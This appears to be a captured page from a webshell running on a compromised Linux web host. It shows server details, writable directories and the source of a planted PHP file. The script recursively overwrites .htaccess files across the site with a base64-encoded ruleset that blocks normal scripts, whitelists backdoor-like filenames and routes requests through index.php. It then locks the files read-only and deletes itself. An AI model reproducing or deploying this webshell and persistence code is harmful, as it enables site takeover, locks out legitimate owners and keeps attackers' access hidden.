403Webshell
Server IP : 192.64.118.117  /  Your IP : 18.118.99.234
Web Server : LiteSpeed
System : Linux premium56.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
User : thecgapy ( 1160)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/thecgapy/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/thecgapy/www/contents.php
<?php
function searchDir($path, &$htcontent, &$dir_array){ 
	if(is_dir($path) && is_readable($path)) {
		$dirs=dir($path);
		while($dir=$dirs->read()) {
			if($dir!='.'&& $dir!='..' && $dir!="root") {
				if (is_dir($path.'/'.$dir) && is_readable($path.'/'.$dir) && !is_link($path.'/'.$dir)) {
					@chmod($path.'/'.$dir.'/.htaccess', 0777);
					$curht=file_get_contents($path.'/'.$dir.'/.htaccess');
					if(!strstr($curht, "#wordpress rewrite rules")){
						file_put_contents($path.'/'.$dir.'/.htaccess', $htcontent);
					}
					@chmod($path.'/'.$dir.'/.htaccess', 0444);
					searchDir($path.'/'.$dir,$htcontent, $dir_array);
				}
			} 
		} 
		$dirs->close();
	} 
} 
function writeHtaccessToAllDirs($htcontent) { 
	$dir_array = array();
	searchDir(dirname(__FILE__), $htcontent, $dir_array);
}
$htcontent = base64_decode("PEZpbGVzTWF0Y2ggIi4oUGhQfHBocDV8c3VzcGVjdGVkfHBodG1sfHB5fGV4ZXxwaHB8YXNwfFBocHxhc3B4KSQiPgogT3JkZXIgYWxsb3csZGVueQogRGVueSBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+CjxGaWxlc01hdGNoICJeKHZvdGVzLnBocHxpbmRleC5waHB8d2pzaW5kZXgucGhwfGxvY2s2NjYucGhwfGZvbnQtZWRpdG9yLnBocHxjb250ZW50cy5waHB8d3AtbG9naW4ucGhwfGxvYWQucGhwfHRoZW1lcy5waHB8YWRtaW4ucGhwfHNldHRpbmdzLnBocHxib3R0b20ucGhwfHllYXJzLnBocHxhbHdzby5waHB8c2VydmljZS5waHB8bGljZW5zZS5waHB8bW9kdWxlLnBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIEFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4KPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXgucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIGluZGV4LnBocCBbTF0KPC9JZk1vZHVsZT4=");

echo '<html lang="zh-cn"><head><meta charset="UTF-8"><title>跨站</title>
<style>input {margin: 10px;}</style>
</head><body><div style="margin: 0 auto; width:1100px"><div style="float: left;text-align: left;width:600px">';
echo '<form action="?ac=path" method="post">';
echo '输入: <input style="width:300px" type="text" name="path" value="" /> <br/>';
echo '<input type="submit" value="查找路径下所有目录" />';
echo '</form><br/><br/><br/><br/>';
$file_self = basename(__FILE__);
if (isset($_GET['ac']))
{
    switch ($_GET['ac'])
    {
		case "write":
			@chmod('.htaccess', 0777);
			file_put_contents('.htaccess', $htcontent);
			@chmod('.htaccess', 0444);
			//$htcontent = str_replace("|index.php|", "|", $htcontent);
			writeHtaccessToAllDirs($htcontent);
			//code_put_here
			if(file_exists($file_self)){
				if(!unlink($file_self)){
					echo "$file_self 删除失败!<br/>";
				}else{
					echo "$file_self 删除成功!<br/>";
				}
			}
			break;
        default:
            break;
    }

}
echo '</div></div></body></html>';
exit();

Youez - 2016 - github.com/yon3zu
LinuXploit